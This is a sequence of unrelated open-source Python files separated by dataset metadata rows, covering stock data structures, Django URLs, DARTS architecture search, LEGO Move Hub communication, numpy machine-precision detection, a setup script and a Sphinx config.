                     instances, or of plain dicts (which are wrapped).

    Raises:
        TypeError  -- when elements are neither of the accepted types.
                      (Previously ``self.sr_series`` was silently left
                      unset, producing a confusing AttributeError below.)
    """

    def __init__(self, sr_series):
        first = sr_series[0]
        if isinstance(first, QA_DataStruct_Stock_realtime):
            self.sr_series = sr_series
        elif isinstance(first, dict):
            self.sr_series = [
                QA_DataStruct_Stock_realtime(sr) for sr in sr_series]
        else:
            raise TypeError(
                'sr_series elements must be QA_DataStruct_Stock_realtime '
                'or dict, got {}'.format(type(first)))
        # One DataFrame stacking every snapshot's tabular form.
        self.table = pd.concat([sr._data for sr in self.sr_series])
class QA_DataStruct_Security_list():
    """List of securities (exchange, code, name), indexed by code."""

    def __init__(self, DataFrame):
        # Keep only the identifying columns and index by code; drop=False
        # keeps 'code' available as a regular column as well.
        selected = DataFrame.loc[:, ['sse', 'code', 'name']]
        self.data = selected.set_index('code', drop=False)

    @property
    def code(self):
        """Security codes (also the index)."""
        return self.data['code']

    @property
    def name(self):
        """Human-readable security names."""
        return self.data['name']

    def get_stock(self, ST_option):
        """Return the full table (ST filtering not implemented yet)."""
        return self.data

    def get_index(self):
        """Return the full table (no index filtering implemented yet)."""
        return self.data

    def get_etf(self):
        """Return the full table (no ETF filtering implemented yet)."""
        return self.data
| 27.056009 | 191 | 0.577436 |
d3e047ba968ed5543fdc2df37e4ef7caae1a4e3b | 282 | py | Python | oldp/apps/contact/urls.py | docsuleman/oldp | 8dcaa8e6e435794c872346b5014945ace885adb4 | [
"MIT"
] | 66 | 2018-05-07T12:34:39.000Z | 2022-02-23T20:14:24.000Z | oldp/apps/contact/urls.py | Justice-PLP-DHV/oldp | eadf235bb0925453d9a5b81963a0ce53afeb17fd | [
"MIT"
] | 68 | 2018-06-11T16:13:17.000Z | 2022-02-10T08:03:26.000Z | oldp/apps/contact/urls.py | Justice-PLP-DHV/oldp | eadf235bb0925453d9a5b81963a0ce53afeb17fd | [
"MIT"
] | 15 | 2018-06-23T19:41:13.000Z | 2021-08-18T08:21:49.000Z | from django.conf.urls import url
from . import views

# URL namespace: reverse with e.g. ``{% url 'contact:form' %}``.
app_name = 'contact'

urlpatterns = [
    # Contact form landing page.
    url(r'^$', views.form_view, name='form'),
    # Report-content variant of the contact form.
    url(r'^report_content$', views.report_content_view, name='report_content'),
    # Post-submission confirmation page (prefix match, no anchor at end).
    url(r'^thankyou', views.thankyou_view, name='thankyou'),
]
| 23.5 | 79 | 0.695035 |
2799c38f7607a98f6e70400c29c06184ad9bd84a | 3,675 | py | Python | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | 2 | 2022-01-09T11:09:17.000Z | 2022-03-29T14:16:32.000Z | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | null | null | null | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import torch.nn as nn
from torch.autograd import Variable
def _concat(xs):
return torch.cat([x.view(-1) for x in xs])
class Architect(object):
    """Architecture-parameter (alpha) optimizer for DARTS-style search.

    Owns an Adam optimizer over ``model.arch_parameters()`` and implements
    both the first-order update and the unrolled (second-order) update.
    """

    def __init__(self, model, momentum, weight_decay, arch_learning_rate, arch_weight_decay):
        # Hyper-parameters of the *network-weight* optimizer; needed to
        # replay its momentum step when building the unrolled model.
        self.network_momentum = momentum
        self.network_weight_decay = weight_decay
        self.model = model
        # Adam over the architecture parameters only; the network weights
        # are updated elsewhere by the caller's own optimizer.
        self.optimizer = torch.optim.Adam(self.model.arch_parameters(),
            lr=arch_learning_rate,
            betas=(0.5, 0.999),
            weight_decay=arch_weight_decay
            )

    def _compute_unrolled_model(self, input, target, eta, network_optimizer):
        """Simulate one SGD(+momentum, +weight-decay) step of the network
        weights and return a fresh model holding the stepped weights w'."""
        loss = self.model._loss(input, target)
        theta = _concat(self.model.parameters()).data
        try:
            # Replay the momentum buffers of the real network optimizer.
            moment = _concat(network_optimizer.state[v]['momentum_buffer'] for v in self.model.parameters()).mul_(self.network_momentum)
        except:
            # No momentum state yet (first step): treat momentum as zero.
            moment = torch.zeros_like(theta)
        dtheta = _concat(torch.autograd.grad(loss, self.model.parameters())).data + self.network_weight_decay*theta
        # w' = w - eta * (momentum + grad + weight-decay term)
        # (deprecated two-arg Tensor.sub(alpha, other) form -- Py/torch era)
        unrolled_model = self._construct_model_from_theta(theta.sub(eta, moment+dtheta))
        return unrolled_model

    def step(self, input_train, target_train, input_valid, target_valid, eta, network_optimizer, unrolled):
        """One alpha update: unrolled (2nd-order) or plain validation step."""
        self.optimizer.zero_grad()
        if unrolled:
            self._backward_step_unrolled(input_train, target_train, input_valid, target_valid, eta, network_optimizer)
        else:
            self._backward_step(input_valid, target_valid)
        self.optimizer.step()

    def _backward_step(self, input_valid, target_valid):
        # First-order approximation: plain validation loss gradient.
        loss = self.model._loss(input_valid, target_valid)
        loss.backward()

    def _backward_step_unrolled(self, input_train, target_train, input_valid, target_valid, eta, network_optimizer):
        # Second-order DARTS: grad of validation loss at w', corrected by
        # the implicit term eta * (d^2 L_train / dw dalpha) * dL_val/dw'.
        unrolled_model = self._compute_unrolled_model(input_train, target_train, eta, network_optimizer)
        unrolled_loss = unrolled_model._loss(input_valid, target_valid)

        unrolled_loss.backward()
        dalpha = [v.grad for v in unrolled_model.arch_parameters()]
        vector = [v.grad.data for v in unrolled_model.parameters()]
        implicit_grads = self._hessian_vector_product(vector, input_train, target_train)

        for g, ig in zip(dalpha, implicit_grads):
            # Deprecated two-arg sub_(alpha, other): g -= eta * ig
            g.data.sub_(eta, ig.data)

        # Copy the corrected gradients back onto the live model's alphas.
        for v, g in zip(self.model.arch_parameters(), dalpha):
            if v.grad is None:
                v.grad = Variable(g.data)
            else:
                v.grad.data.copy_(g.data)

    def _construct_model_from_theta(self, theta):
        """Build a new model whose flattened weights equal *theta*."""
        model_new = self.model.new()
        model_dict = self.model.state_dict()

        # Slice the flat theta vector back into per-parameter views.
        params, offset = {}, 0
        for k, v in self.model.named_parameters():
            v_length = np.prod(v.size())
            params[k] = theta[offset: offset+v_length].view(v.size())
            offset += v_length

        assert offset == len(theta)
        model_dict.update(params)
        model_new.load_state_dict(model_dict)
        return model_new.cuda()

    def _hessian_vector_product(self, vector, input, target, r=1e-2):
        """Finite-difference approximation of (d^2 L/dw dalpha) @ vector,
        using w +/- R*vector with R scaled by the vector norm."""
        R = r / _concat(vector).norm()
        for p, v in zip(self.model.parameters(), vector):
            p.data.add_(R, v)
        loss = self.model._loss(input, target)
        grads_p = torch.autograd.grad(loss, self.model.arch_parameters())

        for p, v in zip(self.model.parameters(), vector):
            p.data.sub_(2*R, v)
        loss = self.model._loss(input, target)
        grads_n = torch.autograd.grad(loss, self.model.arch_parameters())

        # Restore the original weights before returning.
        for p, v in zip(self.model.parameters(), vector):
            p.data.add_(R, v)

        return [(x-y).div_(2*R) for x, y in zip(grads_p, grads_n)]
bb5331565b8cd95e8fc5b54d814e9b3db2c514bd | 5,979 | py | Python | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | 1 | 2021-04-04T13:31:28.000Z | 2021-04-04T13:31:28.000Z | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | null | null | null | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | null | null | null | """
This package holds communication aspects
"""
import binascii
import json
import logging
import socket
import traceback
from abc import abstractmethod
from binascii import unhexlify
from threading import Thread
from pylgbst.constants import MSG_DEVICE_SHUTDOWN, ENABLE_NOTIFICATIONS_HANDLE, ENABLE_NOTIFICATIONS_VALUE
from pylgbst.utilities import str2hex
log = logging.getLogger('comms')
LEGO_MOVE_HUB = "LEGO Move Hub"
class Connection(object):
    """Abstract transport to a LEGO Move Hub (BLE or debug-proxy based)."""

    def connect(self, hub_mac=None):
        """Establish the link; concrete transports override this no-op."""
        pass

    def disconnect(self):
        """Tear the link down; default is a no-op."""
        pass

    @abstractmethod
    def is_alive(self):
        """Report whether the link is still up."""
        pass

    @abstractmethod
    def write(self, handle, data):
        """Send raw *data* bytes to the given GATT *handle*."""
        pass

    @abstractmethod
    def set_notify_handler(self, handler):
        """Register *handler* to receive incoming notifications."""
        pass

    def enable_notifications(self):
        """Ask the hub to start pushing notifications to us."""
        self.write(ENABLE_NOTIFICATIONS_HANDLE, ENABLE_NOTIFICATIONS_VALUE)
class DebugServer(object):
    """
    Starts TCP server to be used with DebugServerConnection to speed-up development process
    It holds BLE connection to Move Hub, so no need to re-start it every time
    Usage: DebugServer(BLEConnection().connect()).start()

    :type connection: BLEConnection
    """

    def __init__(self, connection):
        self._running = False
        self.sock = socket.socket()
        self.connection = connection

    def start(self, port=9090):
        """Accept debug clients one at a time, bridging each to the BLE link."""
        self.sock.bind(('', port))
        self.sock.listen(1)

        self._running = True
        while self._running:
            log.info("Accepting MoveHub debug connections at %s", port)
            conn, addr = self.sock.accept()
            if not self._running:
                raise KeyboardInterrupt("Shutdown")
            # Route BLE notifications to this client while it is attached.
            self.connection.set_notify_handler(lambda x, y: self._notify(conn, x, y))
            try:
                self._handle_conn(conn)
            except KeyboardInterrupt:
                raise
            except BaseException:
                log.error("Problem handling incoming connection: %s", traceback.format_exc())
            finally:
                # Detach the client: notifications fall back to the dummy sink.
                self.connection.set_notify_handler(self._notify_dummy)
                conn.close()

    def __del__(self):
        self.sock.close()

    def _notify_dummy(self, handle, data):
        # Sink used while no client is connected; still watches for the
        # hub's shutdown message so the accept loop can stop.
        log.debug("Dropped notification from handle %s: %s", handle, binascii.hexlify(data))
        self._check_shutdown(data)

    def _notify(self, conn, handle, data):
        # Forward a BLE notification to the attached client as one JSON line.
        payload = {"type": "notification", "handle": handle, "data": str2hex(data)}
        log.debug("Send notification: %s", payload)
        try:
            # NOTE(review): sends a str -- Python-2-era code; under Python 3
            # socket.send() requires bytes.  Confirm target interpreter.
            conn.send(json.dumps(payload) + "\n")
        except KeyboardInterrupt:
            raise
        except BaseException:
            log.error("Problem sending notification: %s", traceback.format_exc())

        self._check_shutdown(data)

    def _check_shutdown(self, data):
        # Byte 5 of the hub message carries the message type.
        if data[5] == MSG_DEVICE_SHUTDOWN:
            log.warning("Device shutdown")
            self._running = False

    def _handle_conn(self, conn):
        """
        Read newline-delimited JSON commands from the client until EOF.

        :type conn: socket._socketobject
        """
        buf = ""
        while True:
            data = conn.recv(1024)
            log.debug("Recv: %s", data.strip())
            if not data:
                break

            buf += data

            # NOTE(review): only one command is consumed per recv chunk
            # (``if`` rather than ``while``); extra complete lines wait for
            # the next chunk.  Confirm this is intended.
            if "\n" in buf:
                line = buf[:buf.index("\n")]
                buf = buf[buf.index("\n") + 1:]
                if line:
                    log.info("Cmd line: %s", line)
                    try:
                        self._handle_cmd(json.loads(line))
                    except KeyboardInterrupt:
                        raise
                    except BaseException:
                        log.error("Failed to handle cmd: %s", traceback.format_exc())

    def _handle_cmd(self, cmd):
        # Only 'write' commands are supported: forward to the BLE link.
        if cmd['type'] == 'write':
            self.connection.write(cmd['handle'], unhexlify(cmd['data']))
        else:
            raise ValueError("Unhandled cmd: %s", cmd)
class DebugServerConnection(Connection):
    """
    Connection type to be used with DebugServer, replaces BLEConnection
    """

    def __init__(self, port=9090):
        super(DebugServerConnection, self).__init__()
        self.notify_handler = None
        self.buf = ""
        self.sock = socket.socket()
        self.sock.connect(('localhost', port))
        self.incoming = []

        # Daemon thread that pumps inbound JSON lines for the whole
        # lifetime of the connection.
        self.reader = Thread(target=self._recv)
        self.reader.setName("Debug connection reader")
        self.reader.setDaemon(True)
        self.reader.start()

    def __del__(self):
        self.sock.close()

    def write(self, handle, data):
        # Serialize a GATT write as a JSON command for the debug server.
        payload = {
            "type": "write",
            "handle": handle,
            "data": str2hex(data)
        }
        self._send(payload)

    def _send(self, payload):
        log.debug("Sending to debug server: %s", payload)
        # NOTE(review): sends a str -- Python-2-era code; under Python 3
        # socket.send() requires bytes.  Confirm target interpreter.
        self.sock.send(json.dumps(payload) + "\n")

    def _recv(self):
        # Reader-thread loop: split the stream on newlines and dispatch
        # each JSON message by its 'type' field.
        while True:
            data = self.sock.recv(1024)
            log.debug("Recv from debug server: %s", data.strip())
            if not data:
                raise KeyboardInterrupt("Server has closed connection")

            self.buf += data

            while "\n" in self.buf:
                line = self.buf[:self.buf.index("\n")]
                self.buf = self.buf[self.buf.index("\n") + 1:]
                if line:
                    item = json.loads(line)
                    if item['type'] == 'notification' and self.notify_handler:
                        try:
                            self.notify_handler(item['handle'], unhexlify(item['data']))
                        except BaseException:
                            log.error("Failed to notify handler: %s", traceback.format_exc())
                    elif item['type'] == 'response':
                        # Responses are queued for whoever polls ``incoming``.
                        self.incoming.append(item)
                    else:
                        log.warning("Dropped inbound: %s", item)

    def set_notify_handler(self, handler):
        self.notify_handler = handler
72fde37f2bfde474bc6fc1007bd65e35e436e660 | 9,398 | py | Python | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | """
Machine arithmetics - determine the parameters of the
floating-point arithmetic system
"""
# Author: Pearu Peterson, September 2003
__all__ = ['MachAr']
from numpy.core.fromnumeric import any
from numpy.core.numeric import seterr
# Need to speed this up...especially for longfloat
class MachAr(object):
    """Diagnosing machine parameters.

    The following attributes are available:

    ibeta  - radix in which numbers are represented
    it     - number of base-ibeta digits in the floating point mantissa M
    machep - exponent of the smallest (most negative) power of ibeta that,
             added to 1.0,
             gives something different from 1.0
    eps    - floating-point number beta**machep (floating point precision)
    negep  - exponent of the smallest power of ibeta that, subtracted
             from 1.0, gives something different from 1.0
    epsneg - floating-point number beta**negep
    iexp   - number of bits in the exponent (including its sign and bias)
    minexp - smallest (most negative) power of ibeta consistent with there
             being no leading zeros in the mantissa
    xmin   - floating point number beta**minexp (the smallest (in
             magnitude) usable floating value)
    maxexp - smallest (positive) power of ibeta that causes overflow
    xmax   - (1-epsneg)* beta**maxexp (the largest (in magnitude)
             usable floating value)
    irnd   - in range(6), information on what kind of rounding is done
             in addition, and on how underflow is handled
    ngrd   - number of 'guard digits' used when truncating the product
             of two mantissas to fit the representation

    epsilon    - same as eps
    tiny       - same as xmin
    huge       - same as xmax
    precision  - int(-log10(eps))
    resolution - 10**(-precision)

    Reference:
        Numerical Recipes.
    """

    def __init__(self, float_conv=float,int_conv=int,
                 float_to_float=float,
                 float_to_str = lambda v:'%24.16e' % v,
                 title = 'Python floating point number'):
        """
        float_conv - convert integer to float (array)
        int_conv - convert float (array) to integer
        float_to_float - convert float array to float
        float_to_str - convert array float to str
        title - description of used floating point numbers
        """
        # We ignore all errors here because we are purposely triggering
        # underflow to detect the properties of the running arch.
        saverrstate = seterr(under='ignore')
        try:
            self._do_init(float_conv, int_conv, float_to_float, float_to_str, title)
        finally:
            seterr(**saverrstate)

    def _do_init(self, float_conv, int_conv, float_to_float, float_to_str, title):
        # Probe the FP system empirically (Cody's MACHAR algorithm).  Each
        # loop is bounded so a non-converging arithmetic raises instead of
        # hanging.  (Python 2 syntax: xrange / raise Cls, msg.)
        max_iterN = 10000
        msg = "Did not converge after %d tries with %s"
        one = float_conv(1)
        two = one + one
        zero = one - one

        # Do we really need to do this? Aren't they 2 and 2.0?
        # Determine ibeta and beta
        # Grow ``a`` until a+1 rounds away from a: a is then ~ beta**it.
        a = one
        for _ in xrange(max_iterN):
            a = a + a
            temp = a + one
            temp1 = temp - a
            if any(temp1 - one != zero):
                break
        else:
            raise RuntimeError, msg % (_, one.dtype)
        b = one
        for _ in xrange(max_iterN):
            b = b + b
            temp = a + b
            itemp = int_conv(temp-a)
            if any(itemp != 0):
                break
        else:
            raise RuntimeError, msg % (_, one.dtype)
        ibeta = itemp
        beta = float_conv(ibeta)

        # Determine it (mantissa digits) and irnd (rounding behaviour)
        it = -1
        b = one
        for _ in xrange(max_iterN):
            it = it + 1
            b = b * beta
            temp = b + one
            temp1 = temp - b
            if any(temp1 - one != zero):
                break
        else:
            raise RuntimeError, msg % (_, one.dtype)

        betah = beta / two
        a = one
        for _ in xrange(max_iterN):
            a = a + a
            temp = a + one
            temp1 = temp - a
            if any(temp1 - one != zero):
                break
        else:
            raise RuntimeError, msg % (_, one.dtype)
        temp = a + betah
        irnd = 0
        if any(temp-a != zero):
            irnd = 1
        tempa = a + beta
        temp = tempa + betah
        if irnd==0 and any(temp-tempa != zero):
            irnd = 2

        # Determine negep and epsneg (smallest x with 1-x != 1)
        negep = it + 3
        betain = one / beta
        a = one
        for i in range(negep):
            a = a * betain
        b = a
        for _ in xrange(max_iterN):
            temp = one - a
            if any(temp-one != zero):
                break
            a = a * beta
            negep = negep - 1
            # Prevent infinite loop on PPC with gcc 4.0:
            if negep < 0:
                raise RuntimeError, "could not determine machine tolerance " \
                      "for 'negep', locals() -> %s" % (locals())
        else:
            raise RuntimeError, msg % (_, one.dtype)
        negep = -negep
        epsneg = a

        # Determine machep and eps (smallest x with 1+x != 1)
        machep = - it - 3
        a = b
        for _ in xrange(max_iterN):
            temp = one + a
            if any(temp-one != zero):
                break
            a = a * beta
            machep = machep + 1
        else:
            raise RuntimeError, msg % (_, one.dtype)
        eps = a

        # Determine ngrd (guard digits in multiplication)
        ngrd = 0
        temp = one + eps
        if irnd==0 and any(temp*one - one != zero):
            ngrd = 1

        # Determine iexp (exponent bits) by repeated squaring of 1/beta
        # until underflow behaviour is observed.
        i = 0
        k = 1
        z = betain
        t = one + eps
        nxres = 0
        for _ in xrange(max_iterN):
            y = z
            z = y*y
            a = z*one # Check here for underflow
            temp = z*t
            if any(a+a == zero) or any(abs(z)>=y):
                break
            temp1 = temp * betain
            if any(temp1*beta == z):
                break
            i = i + 1
            k = k + k
        else:
            raise RuntimeError, msg % (_, one.dtype)
        if ibeta != 10:
            iexp = i + 1
            mx = k + k
        else:
            iexp = 2
            iz = ibeta
            while k >= iz:
                iz = iz * ibeta
                iexp = iexp + 1
            mx = iz + iz - 1

        # Determine minexp and xmin (smallest usable magnitude)
        for _ in xrange(max_iterN):
            xmin = y
            y = y * betain
            a = y * one
            temp = y * t
            if any(a+a != zero) and any(abs(y) < xmin):
                k = k + 1
                temp1 = temp * betain
                if any(temp1*beta == y) and any(temp != y):
                    # Partial underflow with rounding at this scale.
                    nxres = 3
                    xmin = y
                    break
            else:
                break
        else:
            raise RuntimeError, msg % (_, one.dtype)
        minexp = -k

        # Determine maxexp, xmax (largest usable magnitude)
        if mx <= k + k - 3 and ibeta != 10:
            mx = mx + mx
            iexp = iexp + 1
        maxexp = mx + minexp
        irnd = irnd + nxres
        if irnd >= 2:
            maxexp = maxexp - 2
        i = maxexp + minexp
        if ibeta == 2 and not i:
            maxexp = maxexp - 1
        if i > 20:
            maxexp = maxexp - 1
        if any(a != y):
            maxexp = maxexp - 2
        xmax = one - epsneg
        if any(xmax*one != xmax):
            xmax = one - beta*epsneg
        xmax = xmax / (xmin*beta*beta*beta)
        i = maxexp + minexp + 3
        for j in range(i):
            if ibeta==2:
                xmax = xmax + xmax
            else:
                xmax = xmax * beta

        # Publish the detected parameters on the instance.
        self.ibeta = ibeta
        self.it = it
        self.negep = negep
        self.epsneg = float_to_float(epsneg)
        self._str_epsneg = float_to_str(epsneg)
        self.machep = machep
        self.eps = float_to_float(eps)
        self._str_eps = float_to_str(eps)
        self.ngrd = ngrd
        self.iexp = iexp
        self.minexp = minexp
        self.xmin = float_to_float(xmin)
        self._str_xmin = float_to_str(xmin)
        self.maxexp = maxexp
        self.xmax = float_to_float(xmax)
        self._str_xmax = float_to_str(xmax)
        self.irnd = irnd

        self.title = title
        # Commonly used parameters
        self.epsilon = self.eps
        self.tiny = self.xmin
        self.huge = self.xmax

        import math
        self.precision = int(-math.log10(float_to_float(self.eps)))
        ten = two + two + two + two + two
        resolution = ten ** (-self.precision)
        self.resolution = float_to_float(resolution)
        self._str_resolution = float_to_str(resolution)

    def __str__(self):
        # %-template filled straight from the instance attribute dict.
        return '''\
Machine parameters for %(title)s
---------------------------------------------------------------------
ibeta=%(ibeta)s it=%(it)s iexp=%(iexp)s ngrd=%(ngrd)s irnd=%(irnd)s
machep=%(machep)s eps=%(_str_eps)s (beta**machep == epsilon)
negep =%(negep)s epsneg=%(_str_epsneg)s (beta**epsneg)
minexp=%(minexp)s xmin=%(_str_xmin)s (beta**minexp == tiny)
maxexp=%(maxexp)s xmax=%(_str_xmax)s ((1-epsneg)*beta**maxexp == huge)
---------------------------------------------------------------------
''' % self.__dict__
# Manual smoke test: print the detected parameters for the default Python
# float type (Python 2 print statement).
if __name__ == '__main__':
    print MachAr()
| 31.75 | 84 | 0.503618 |
133225901fd5c57b3f3937a463aaa96d1fe82e61 | 1,761 | py | Python | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | 2 | 2019-11-04T09:33:44.000Z | 2021-02-28T16:06:30.000Z | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | 8 | 2018-08-01T22:41:32.000Z | 2018-10-15T21:48:33.000Z | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | null | null | null | import setuptools
long_description="""# RaspiCameraLivestream
### A very simple library built for streaming video from a remote Raspberry Pi server in realtime.
---
## How to install:
### MacOS or linux:
Open your terminal and type:
``` bash
sudo python -m pip install rpistream
```
### Windows:
Open cmd as admin and type:
```cmd
pip install rpistream
```
---
## Examples:
### Streaming from a webcam
Server
```python
from rpistream.camera import Camera
from rpistream.streamserver import Server
def retrieveImage(cam,imgResize):
image = cv2.resize(cam.image,(0,0),fx=imgResize,fy=imgResize)
return image
cam = Camera(mirror=True)
scale=0.5
server = Server(port=5000)
server.serve() # Blocking; waits for a connection before continuing
server.startStream(retrieveImage,[cam,scale]) # Calls retrieveImage(*args) every frame
```
Client
```python
from rpistream.streamclient import Client
client = Client(serverIp="localhost", WriteFile=True) # Connects to the server
client.startStream() # Starts recieving data and displaying the video
```
"""
setuptools.setup(
name="rpistream",
version="0.2.2",
author="Theo Cooper and Ian Huang",
author_email="theoac2009@outlook.com",
description="A very simple library built for streaming video from a remote Raspberry Pi server in realtime.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thatguy1234510/rpistream",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
),
install_requires=[
'zstandard'
#'opencv-python'
]
) | 22.291139 | 113 | 0.71096 |
484e1321817f004c2f06cc3d1d70f41523918835 | 77 | py | Python | src/main/python/ui/distribution/__init__.py | boom-roasted/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | 1 | 2020-03-22T01:52:52.000Z | 2020-03-22T01:52:52.000Z | src/main/python/ui/distribution/__init__.py | leftaltkey/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | 2 | 2021-06-08T21:12:47.000Z | 2021-06-08T21:30:32.000Z | src/main/python/ui/distribution/__init__.py | leftaltkey/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | null | null | null | from .distributionform import DistributionForm
__all__ = [DistributionForm]
| 19.25 | 46 | 0.844156 |
f48a868c0ac914f3c0075ac4e43a052567ff7fa8 | 10,211 | py | Python | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# POT documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 24 11:10:10 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re

#try:
from unittest.mock import MagicMock
#except ImportError:
#    from mock import MagicMock

# Make the in-tree ``ot`` package importable for autodoc.
sys.path.insert(0, os.path.abspath("../.."))

#sys.setrecursionlimit(1500)

class Mock(MagicMock):
    # Import-time stand-in for compiled extension modules that cannot be
    # built on the documentation host: any attribute access yields a Mock.
    @classmethod
    def __getattr__(cls, name):
        return Mock()

# Compiled modules to fake out so ``import ot`` succeeds during doc builds.
MOCK_MODULES = [ 'emd','ot.lp.emd']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode', 'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'POT Python Optimal Transport library'
copyright = u'2016, Rémi Flamary, Nicolas Courty'
author = u'Rémi Flamary, Nicolas Courty'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Parse the version string out of the package source without importing the
# package (its compiled parts are mocked above, so importing would be
# unreliable for metadata).
__version__ = re.search(
    r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]', # It excludes inline comment too
    open('../../ot/__init__.py').read()).group(1)

# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
